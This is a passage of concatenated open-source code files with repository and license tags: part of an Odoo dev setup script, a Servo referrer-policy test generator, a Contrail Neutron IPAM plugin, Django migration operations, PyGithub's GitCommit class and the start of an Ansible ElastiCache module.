open(pre_push_path,'w').write(GIT_HOOKS_PRE_PUSH.strip())
os.chmod(pre_push_path, 0755)
# setup odoo remote
run('git','config','remote.odoo.url','https://github.com/odoo/odoo.git')
run('git','config','remote.odoo.pushurl','[email protected]:odoo/odoo.git')
run('git','config','--add','remote.odoo.fetch','dummy')
run('git','config','--unset-all','remote.odoo.fetch')
run('git','config','--add','remote.odoo.fetch','+refs/heads/*:refs/remotes/odoo/*')
# setup odoo-dev remote
run('git','config','remote.odoo-dev.url','https://github.com/odoo-dev/odoo.git')
run('git','config','remote.odoo-dev.pushurl','[email protected]:odoo-dev/odoo.git')
run('git','remote','update')
# setup 8.0 branch
run('git','config','branch.8.0.remote','odoo')
run('git','config','branch.8.0.merge','refs/heads/8.0')
run('git','checkout','8.0')
else:
printf('no git repo found')
def cmd_setup_git_dev():
git_dir = git_locate()
if git_dir:
# setup odoo-dev remote
run('git','config','--add','remote.odoo-dev.fetch','dummy')
run('git','config','--unset-all','remote.odoo-dev.fetch')
run('git','config','--add','remote.odoo-dev.fetch','+refs/heads/*:refs/remotes/odoo-dev/*')
run('git','config','--add','remote.odoo-dev.fetch','+refs/pull/*:refs/remotes/odoo-dev/pull/*')
run('git','remote','update')
def cmd_setup_git_review():
git_dir = git_locate()
if git_dir:
# setup odoo-dev remote
run('git','config','--add','remote.odoo.fetch','dummy')
run('git','config','--unset-all','remote.odoo.fetch')
run('git','config','--add','remote.odoo.fetch','+refs/heads/*:refs/remotes/odoo/*')
run('git','config','--add','remote.odoo.fetch','+refs/tags/*:refs/remotes/odoo/tags/*')
run('git','config','--add','remote.odoo.fetch','+refs/pull/*:refs/remotes/odoo/pull/*')
def setup_deps_debian(git_dir):
debian_control_path = os.path.join(git_dir, 'debian/control')
debian_control = open(debian_control_path).read()
debs = re.findall('python-[0-9a-z]+',debian_control)
debs += ["postgresql"]
proc = subprocess.Popen(['sudo','apt-get','install'] + debs, stdin=open('/dev/tty'))
proc.communicate()
def cmd_setup_deps():
git_dir = git_locate()
if git_dir:
if os.path.isfile('/etc/debian_version'):
setup_deps_debian(git_dir)
def setup_pg_debian(git_dir):
cmd = ['sudo','su','-','postgres','-c','createuser -s %s' % os.environ['USER']]
subprocess.call(cmd)
def cmd_setup_pg():
git_dir = git_locate()
if git_dir:
if os.path.isfile('/etc/debian_version'):
setup_pg_debian(git_dir)
def cmd_setup():
cmd_setup_git()
cmd_setup_deps()
cmd_setup_pg()
def main():
# registry of commands
g = globals()
cmds = dict([(i[4:],g[i]) for i in g if i.startswith('cmd_')])
# if curl URL | python2 then use command setup
if len(sys.argv) == 1 and __file__ == '<stdin>':
cmd_setup()
elif len(sys.argv) == 2 and sys.argv[1] in cmds:
cmds[sys.argv[1]]()
else:
import openerp
openerp.cli.main()
if __name__ == "__main__":
main()
|
agpl-3.0
|
Jayflux/servo
|
tests/wpt/mozilla/tests/mozilla/referrer-policy/generic/tools/generate.py
|
53
|
7650
|
#!/usr/bin/env python
import os, sys, json
from common_paths import *
import spec_validator
import argparse
def expand_test_expansion_pattern(spec_test_expansion, test_expansion_schema):
expansion = {}
for artifact in spec_test_expansion:
artifact_value = spec_test_expansion[artifact]
if artifact_value == '*':
expansion[artifact] = test_expansion_schema[artifact]
elif isinstance(artifact_value, list):
expansion[artifact] = artifact_value
else:
expansion[artifact] = [artifact_value]
return expansion
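# Illustrative only (hypothetical values): given
#   spec_test_expansion   = {'origin': '*', 'redirection': ['no-redirect'], 'name': 'x'}
#   test_expansion_schema = {'origin': ['same-origin', 'cross-origin'], ...}
# the returned expansion is
#   {'origin': ['same-origin', 'cross-origin'], 'redirection': ['no-redirect'], 'name': ['x']}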
def permute_expansion(expansion, selection = {}, artifact_index = 0):
artifact_order = ['delivery_method', 'redirection', 'origin',
'source_protocol', 'target_protocol', 'subresource',
'referrer_url', 'name']
if artifact_index >= len(artifact_order):
yield selection
return
artifact_key = artifact_order[artifact_index]
for artifact_value in expansion[artifact_key]:
selection[artifact_key] = artifact_value
for next_selection in permute_expansion(expansion,
selection,
artifact_index + 1):
yield next_selection
def generate_selection(selection, spec, subresource_path,
test_html_template_basename):
selection['spec_name'] = spec['name']
selection['spec_title'] = spec['title']
selection['spec_description'] = spec['description']
selection['spec_specification_url'] = spec['specification_url']
selection['subresource_path'] = subresource_path
# Oddball: it can be None, so in JS it's null.
selection['referrer_policy_json'] = json.dumps(spec['referrer_policy'])
test_filename = test_file_path_pattern % selection
test_directory = os.path.dirname(test_filename)
full_path = os.path.join(spec_directory, test_directory)
test_html_template = get_template(test_html_template_basename)
test_js_template = get_template("test.js.template")
disclaimer_template = get_template('disclaimer.template')
test_description_template = get_template("test_description.template")
html_template_filename = os.path.join(template_directory,
test_html_template_basename)
generated_disclaimer = disclaimer_template \
% {'generating_script_filename': os.path.relpath(__file__,
test_root_directory),
'html_template_filename': os.path.relpath(html_template_filename,
test_root_directory)}
# Adjust the template for the test invoking JS. Indent it to look nice.
selection['generated_disclaimer'] = generated_disclaimer.rstrip()
test_description_template = \
test_description_template.rstrip().replace("\n", "\n" + " " * 33)
selection['test_description'] = test_description_template % selection
# Adjust the template for the test invoking JS. Indent it to look nice.
indent = "\n" + " " * 6;
test_js_template = indent + test_js_template.replace("\n", indent);
selection['test_js'] = test_js_template % selection
# Directory for the test files.
try:
os.makedirs(full_path)
except:
pass
selection['meta_delivery_method'] = ''
if spec['referrer_policy'] != None:
if selection['delivery_method'] == 'meta-referrer':
selection['meta_delivery_method'] = \
'<meta name="referrer" content="%(referrer_policy)s">' % spec
elif selection['delivery_method'] == 'meta-csp':
selection['meta_delivery_method'] = \
'<meta http-equiv="Content-Security-Policy" ' + \
'content="referrer %(referrer_policy)s">' % spec
elif selection['delivery_method'] == 'http-rp':
selection['meta_delivery_method'] = \
'<!-- No meta: Referrer policy delivered via HTTP headers. -->' \
'<meta name="http-referrer-policy" content="%(referrer_policy)s">' % spec
test_headers_filename = test_filename + ".headers"
with open(test_headers_filename, "w") as f:
f.write('Referrer-Policy: ' + \
'%(referrer_policy)s\n' % spec)
# TODO(kristijanburnik): Limit to WPT origins.
f.write('Access-Control-Allow-Origin: *\n')
elif selection['delivery_method'] == 'attr-referrer':
# attr-referrer is supported by the JS test wrapper.
pass
elif selection['delivery_method'] == 'rel-noreferrer':
# rel=noreferrer is supported by the JS test wrapper.
pass
else:
raise ValueError('Not implemented delivery_method: ' \
+ selection['delivery_method'])
# Obey the lint and pretty format.
if len(selection['meta_delivery_method']) > 0:
selection['meta_delivery_method'] = "\n " + \
selection['meta_delivery_method']
with open(test_filename, 'w') as f:
f.write(test_html_template % selection)
def generate_test_source_files(spec_json, target):
test_expansion_schema = spec_json['test_expansion_schema']
specification = spec_json['specification']
spec_json_js_template = get_template('spec_json.js.template')
with open(generated_spec_json_filename, 'w') as f:
f.write(spec_json_js_template
% {'spec_json': json.dumps(spec_json)})
# Choose a debug/release template depending on the target.
html_template = "test.%s.html.template" % target
# Create list of excluded tests.
exclusion_dict = {}
for excluded_pattern in spec_json['excluded_tests']:
excluded_expansion = \
expand_test_expansion_pattern(excluded_pattern,
test_expansion_schema)
for excluded_selection in permute_expansion(excluded_expansion):
excluded_selection_path = selection_pattern % excluded_selection
exclusion_dict[excluded_selection_path] = True
for spec in specification:
for spec_test_expansion in spec['test_expansion']:
expansion = expand_test_expansion_pattern(spec_test_expansion,
test_expansion_schema)
for selection in permute_expansion(expansion):
selection_path = selection_pattern % selection
if not selection_path in exclusion_dict:
subresource_path = \
spec_json["subresource_path"][selection["subresource"]]
generate_selection(selection,
spec,
subresource_path,
html_template)
else:
print 'Excluding selection:', selection_path
def main(target):
spec_json = load_spec_json();
spec_validator.assert_valid_spec_json(spec_json)
generate_test_source_files(spec_json, target)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Test suite generator utility')
parser.add_argument('-t', '--target', type = str,
choices = ("release", "debug"), default = "release",
help = 'Sets the appropriate template for generating tests')
# TODO(kristijanburnik): Add option for the spec_json file.
args = parser.parse_args()
main(args.target)
|
mpl-2.0
|
JioCloud/contrail-neutron-plugin
|
neutron_plugin_contrail/plugins/opencontrail/contrail_plugin_ipam.py
|
10
|
3050
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2014 Juniper Networks. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Hampapur Ajay, Praneet Bachheti
import copy
import logging
from pprint import pformat
import sys
import cgitb
LOG = logging.getLogger(__name__)
class NeutronPluginContrailIpam(object):
def set_core(self, core_instance):
self._core = core_instance
def _make_ipam_dict(self, entry, status_code=None, fields=None):
return entry
def create_ipam(self, context, ipam):
"""
Creates a new ipam, and assigns it a symbolic name.
"""
plugin_ipam = copy.deepcopy(ipam)
ipam_dicts = self._core._create_resource('ipam', context, plugin_ipam)
LOG.debug("create_ipam(): " + pformat(ipam_dicts) + "\n")
return ipam_dicts
def get_ipam(self, context, ipam_id, fields=None):
"""
Get the attributes of a ipam.
"""
ipam_dicts = self._core._get_resource('ipam', context, ipam_id, fields)
LOG.debug("get_ipam(): " + pformat(ipam_dicts))
return ipam_dicts
def update_ipam(self, context, ipam_id, ipam):
"""
Updates the attributes of a particular ipam.
"""
plugin_ipam = copy.deepcopy(ipam)
ipam_dicts = self._core._update_resource('ipam', context, ipam_id,
plugin_ipam)
LOG.debug("update_ipam(): " + pformat(ipam_dicts))
return ipam_dicts
def delete_ipam(self, context, ipam_id):
"""
Deletes the ipam with the specified identifier.
"""
self._core._delete_resource('ipam', context, ipam_id)
LOG.debug("delete_ipam(): %s" % (ipam_id))
def get_ipams(self, context, filters=None, fields=None):
"""
Retrieves all ipams identifiers.
"""
ipam_dicts = self._core._list_resource('ipam', context, filters,
fields)
LOG.debug(
"get_ipams(): filters: " + pformat(filters) + " data: "
+ pformat(ipam_dicts))
return ipam_dicts
def get_ipams_count(self, context, filters=None):
"""
Get the count of ipams.
"""
ipams_count = self._core._count_resource('ipam', context, filters)
LOG.debug("get_ipams_count(): filters: " + pformat(filters) +
" data: " + str(ipams_count['count']))
return ipams_count['count']
|
apache-2.0
|
thawatchai/mrkimontour
|
appengine-django/lib/django/db/migrations/operations/models.py
|
290
|
21735
|
from __future__ import unicode_literals
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.db.models.options import normalize_together
from django.utils import six
from django.utils.functional import cached_property
class CreateModel(Operation):
"""
Create a model's table.
"""
serialization_expand_args = ['fields', 'options', 'managers']
def __init__(self, name, fields, options=None, bases=None, managers=None):
self.name = name
self.fields = fields
self.options = options or {}
self.bases = bases or (models.Model,)
self.managers = managers or []
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'fields': self.fields,
}
if self.options:
kwargs['options'] = self.options
if self.bases and self.bases != (models.Model,):
kwargs['bases'] = self.bases
if self.managers and self.managers != [('objects', models.Manager())]:
kwargs['managers'] = self.managers
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.add_model(ModelState(
app_label,
self.name,
list(self.fields),
dict(self.options),
tuple(self.bases),
list(self.managers),
))
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def describe(self):
return "Create %smodel %s" % ("proxy " if self.options.get("proxy", False) else "", self.name)
def references_model(self, name, app_label=None):
strings_to_check = [self.name]
# Check we didn't inherit from the model
for base in self.bases:
if isinstance(base, six.string_types):
strings_to_check.append(base.split(".")[-1])
# Check we have no FKs/M2Ms with it
for fname, field in self.fields:
if field.remote_field:
if isinstance(field.remote_field.model, six.string_types):
strings_to_check.append(field.remote_field.model.split(".")[-1])
# Now go over all the strings and compare them
for string in strings_to_check:
if string.lower() == name.lower():
return True
return False
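# Illustrative only (not part of Django): a CreateModel operation as it would
# appear inside a generated migration's `operations` list; the model and field
# names here are hypothetical.
#
#     migrations.CreateModel(
#         name='Author',
#         fields=[
#             ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True)),
#             ('name', models.CharField(max_length=100)),
#         ],
#         options={'ordering': ['name']},
#     )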
class DeleteModel(Operation):
"""
Drops a model's table.
"""
def __init__(self, name):
self.name = name
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.remove_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Delete model %s" % (self.name, )
class RenameModel(Operation):
"""
Renames a model.
"""
def __init__(self, old_name, new_name):
self.old_name = old_name
self.new_name = new_name
@cached_property
def old_name_lower(self):
return self.old_name.lower()
@cached_property
def new_name_lower(self):
return self.new_name.lower()
def deconstruct(self):
kwargs = {
'old_name': self.old_name,
'new_name': self.new_name,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
apps = state.apps
model = apps.get_model(app_label, self.old_name)
model._meta.apps = apps
# Get all of the related objects we need to repoint
all_related_objects = (
f for f in model._meta.get_fields(include_hidden=True)
if f.auto_created and not f.concrete and (not f.hidden or f.many_to_many)
)
# Rename the model
state.models[app_label, self.new_name_lower] = state.models[app_label, self.old_name_lower]
state.models[app_label, self.new_name_lower].name = self.new_name
state.remove_model(app_label, self.old_name_lower)
# Repoint the FKs and M2Ms pointing to us
for related_object in all_related_objects:
if related_object.model is not model:
# The model being renamed does not participate in this relation
# directly. Rather, a superclass does.
continue
# Use the new related key for self referential related objects.
if related_object.related_model == model:
related_key = (app_label, self.new_name_lower)
else:
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
new_fields = []
for name, field in state.models[related_key].fields:
if name == related_object.field.name:
field = field.clone()
field.remote_field.model = "%s.%s" % (app_label, self.new_name)
new_fields.append((name, field))
state.models[related_key].fields = new_fields
state.reload_model(*related_key)
state.reload_model(app_label, self.new_name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.new_name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.old_name)
# Move the main table
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Alter the fields pointing to us
for related_object in old_model._meta.related_objects:
if related_object.related_model == old_model:
model = new_model
related_key = (app_label, self.new_name_lower)
else:
model = related_object.related_model
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
to_field = to_state.apps.get_model(
*related_key
)._meta.get_field(related_object.field.name)
schema_editor.alter_field(
model,
related_object.field,
to_field,
)
# Rename M2M fields whose name is based on this model's name.
fields = zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many)
for (old_field, new_field) in fields:
# Skip self-referential fields as these are renamed above.
if new_field.model == new_field.related_model or not new_field.remote_field.through._meta.auto_created:
continue
# Rename the M2M table that's based on this model's name.
old_m2m_model = old_field.remote_field.through
new_m2m_model = new_field.remote_field.through
schema_editor.alter_db_table(
new_m2m_model,
old_m2m_model._meta.db_table,
new_m2m_model._meta.db_table,
)
# Rename the column in the M2M table that's based on this
# model's name.
schema_editor.alter_field(
new_m2m_model,
old_m2m_model._meta.get_field(old_model._meta.model_name),
new_m2m_model._meta.get_field(new_model._meta.model_name),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
self.new_name, self.old_name = self.old_name, self.new_name
self.database_forwards(app_label, schema_editor, from_state, to_state)
self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
self.new_name, self.old_name = self.old_name, self.new_name
def references_model(self, name, app_label=None):
return (
name.lower() == self.old_name_lower or
name.lower() == self.new_name_lower
)
def describe(self):
return "Rename model %s to %s" % (self.old_name, self.new_name)
class AlterModelTable(Operation):
"""
Renames a model's table
"""
def __init__(self, name, table):
self.name = name
self.table = table
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'table': self.table,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.models[app_label, self.name_lower].options["db_table"] = self.table
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Rename M2M fields whose name is based on this model's db_table
for (old_field, new_field) in zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many):
if new_field.remote_field.through._meta.auto_created:
schema_editor.alter_db_table(
new_field.remote_field.through,
old_field.remote_field.through._meta.db_table,
new_field.remote_field.through._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Rename table for %s to %s" % (self.name, self.table)
class AlterUniqueTogether(Operation):
"""
Changes the value of unique_together to the target one.
Input value of unique_together must be a set of tuples.
"""
option_name = "unique_together"
def __init__(self, name, unique_together):
self.name = name
unique_together = normalize_together(unique_together)
self.unique_together = set(tuple(cons) for cons in unique_together)
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'unique_together': self.unique_together,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options[self.option_name] = self.unique_together
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_unique_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
not self.unique_together or
any((name in together) for together in self.unique_together)
)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.unique_together or ''))
class AlterIndexTogether(Operation):
"""
Changes the value of index_together to the target one.
Input value of index_together must be a set of tuples.
"""
option_name = "index_together"
def __init__(self, name, index_together):
self.name = name
index_together = normalize_together(index_together)
self.index_together = set(tuple(cons) for cons in index_together)
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'index_together': self.index_together,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options[self.option_name] = self.index_together
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_index_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
not self.index_together or
any((name in together) for together in self.index_together)
)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.index_together or ''))
class AlterOrderWithRespectTo(Operation):
"""
Represents a change with the order_with_respect_to option.
"""
def __init__(self, name, order_with_respect_to):
self.name = name
self.order_with_respect_to = order_with_respect_to
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'order_with_respect_to': self.order_with_respect_to,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options['order_with_respect_to'] = self.order_with_respect_to
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
to_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, to_model):
from_model = from_state.apps.get_model(app_label, self.name)
# Remove a field if we need to
if from_model._meta.order_with_respect_to and not to_model._meta.order_with_respect_to:
schema_editor.remove_field(from_model, from_model._meta.get_field("_order"))
# Add a field if we need to (altering the column is untouched as
# it's likely a rename)
elif to_model._meta.order_with_respect_to and not from_model._meta.order_with_respect_to:
field = to_model._meta.get_field("_order")
if not field.has_default():
field.default = 0
schema_editor.add_field(
from_model,
field,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
self.order_with_respect_to is None or
name == self.order_with_respect_to
)
)
def describe(self):
return "Set order_with_respect_to on %s to %s" % (self.name, self.order_with_respect_to)
class AlterModelOptions(Operation):
"""
Sets new model options that don't directly affect the database schema
(like verbose_name, permissions, ordering). Python code in migrations
may still need them.
"""
# Model options we want to compare and preserve in an AlterModelOptions op
ALTER_OPTION_KEYS = [
"get_latest_by",
"managed",
"ordering",
"permissions",
"default_permissions",
"select_on_save",
"verbose_name",
"verbose_name_plural",
]
def __init__(self, name, options):
self.name = name
self.options = options
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
kwargs = {
'name': self.name,
'options': self.options,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options = dict(model_state.options)
model_state.options.update(self.options)
for key in self.ALTER_OPTION_KEYS:
if key not in self.options and key in model_state.options:
del model_state.options[key]
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Change Meta options on %s" % (self.name, )
class AlterModelManagers(Operation):
"""
Alters the model's managers
"""
serialization_expand_args = ['managers']
def __init__(self, name, managers):
self.name = name
self.managers = managers
@cached_property
def name_lower(self):
return self.name.lower()
def deconstruct(self):
return (
self.__class__.__name__,
[self.name, self.managers],
{}
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.managers = list(self.managers)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def references_model(self, name, app_label=None):
return name.lower() == self.name_lower
def describe(self):
return "Change managers on %s" % (self.name, )
|
gpl-2.0
|
CristianBB/SickRage
|
lib/github/GitCommit.py
|
74
|
5226
|
# -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <[email protected]> #
# Copyright 2012 Zearin <[email protected]> #
# Copyright 2013 AKFish <[email protected]> #
# Copyright 2013 Vincent Jacques <[email protected]> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.GitAuthor
import github.GitTree
class GitCommit(github.GithubObject.CompletableGithubObject):
"""
This class represents GitCommits as returned for example by http://developer.github.com/v3/todo
"""
@property
def author(self):
"""
:type: :class:`github.GitAuthor.GitAuthor`
"""
self._completeIfNotSet(self._author)
return self._author.value
@property
def committer(self):
"""
:type: :class:`github.GitAuthor.GitAuthor`
"""
self._completeIfNotSet(self._committer)
return self._committer.value
@property
def html_url(self):
"""
:type: string
"""
self._completeIfNotSet(self._html_url)
return self._html_url.value
@property
def message(self):
"""
:type: string
"""
self._completeIfNotSet(self._message)
return self._message.value
@property
def parents(self):
"""
:type: list of :class:`github.GitCommit.GitCommit`
"""
self._completeIfNotSet(self._parents)
return self._parents.value
@property
def sha(self):
"""
:type: string
"""
self._completeIfNotSet(self._sha)
return self._sha.value
@property
def tree(self):
"""
:type: :class:`github.GitTree.GitTree`
"""
self._completeIfNotSet(self._tree)
return self._tree.value
@property
def url(self):
"""
:type: string
"""
self._completeIfNotSet(self._url)
return self._url.value
@property
def _identity(self):
return self.sha
def _initAttributes(self):
self._author = github.GithubObject.NotSet
self._committer = github.GithubObject.NotSet
self._html_url = github.GithubObject.NotSet
self._message = github.GithubObject.NotSet
self._parents = github.GithubObject.NotSet
self._sha = github.GithubObject.NotSet
self._tree = github.GithubObject.NotSet
self._url = github.GithubObject.NotSet
def _useAttributes(self, attributes):
if "author" in attributes: # pragma no branch
self._author = self._makeClassAttribute(github.GitAuthor.GitAuthor, attributes["author"])
if "committer" in attributes: # pragma no branch
self._committer = self._makeClassAttribute(github.GitAuthor.GitAuthor, attributes["committer"])
if "html_url" in attributes: # pragma no branch
self._html_url = self._makeStringAttribute(attributes["html_url"])
if "message" in attributes: # pragma no branch
self._message = self._makeStringAttribute(attributes["message"])
if "parents" in attributes: # pragma no branch
self._parents = self._makeListOfClassesAttribute(GitCommit, attributes["parents"])
if "sha" in attributes: # pragma no branch
self._sha = self._makeStringAttribute(attributes["sha"])
if "tree" in attributes: # pragma no branch
self._tree = self._makeClassAttribute(github.GitTree.GitTree, attributes["tree"])
if "url" in attributes: # pragma no branch
self._url = self._makeStringAttribute(attributes["url"])
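# Illustrative usage sketch (assumed): fetching a GitCommit through the
# high-level PyGithub entry points; the token, repository name, and sha below
# are placeholders.
#
#     from github import Github
#
#     g = Github("<access-token>")
#     repo = g.get_repo("octocat/Hello-World")
#     commit = repo.get_git_commit("7638417db6d59f3c431d3e1f261cc637155684cd")
#     print(commit.message, commit.author.name, commit.tree.sha)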
|
gpl-3.0
|
omriiluz/ansible-modules-core
|
cloud/amazon/elasticache_subnet_group.py
|
107
|
5473
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: elasticache_subnet_group
version_added: "2.0"
short_description: manage Elasticache subnet groups
description:
- Creates, modifies, and deletes Elasticache subnet groups. This module has a dependency on python-boto >= 2.5.
options:
state:
description:
- Specifies whether the subnet should be present or absent.
required: true
default: present
choices: [ 'present' , 'absent' ]
name:
description:
- Database subnet group identifier.
required: true
description:
description:
- Elasticache subnet group description. Only set when a new group is added.
required: false
default: null
subnets:
description:
- List of subnet IDs that make up the Elasticache subnet group.
required: false
default: null
region:
description:
- The AWS region to use. If not specified then the value of the AWS_REGION or EC2_REGION environment variable, if any, is used.
required: true
aliases: ['aws_region', 'ec2_region']
author: "Tim Mahoney (@timmahoney)"
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Add or change a subnet group
- elasticache_subnet_group
state: present
name: norwegian-blue
description: My Fancy Ex Parrot Subnet Group
subnets:
- subnet-aaaaaaaa
- subnet-bbbbbbbb
# Remove a subnet group
- elasticache_subnet_group:
state: absent
name: norwegian-blue
'''
try:
import boto
from boto.elasticache.layer1 import ElastiCacheConnection
from boto.regioninfo import RegionInfo
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state = dict(required=True, choices=['present', 'absent']),
name = dict(required=True),
description = dict(required=False),
subnets = dict(required=False, type='list'),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
group_name = module.params.get('name').lower()
group_description = module.params.get('description')
group_subnets = module.params.get('subnets') or {}
if state == 'present':
for required in ['name', 'description', 'subnets']:
if not module.params.get(required):
module.fail_json(msg = str("Parameter %s required for state='present'" % required))
else:
for not_allowed in ['description', 'subnets']:
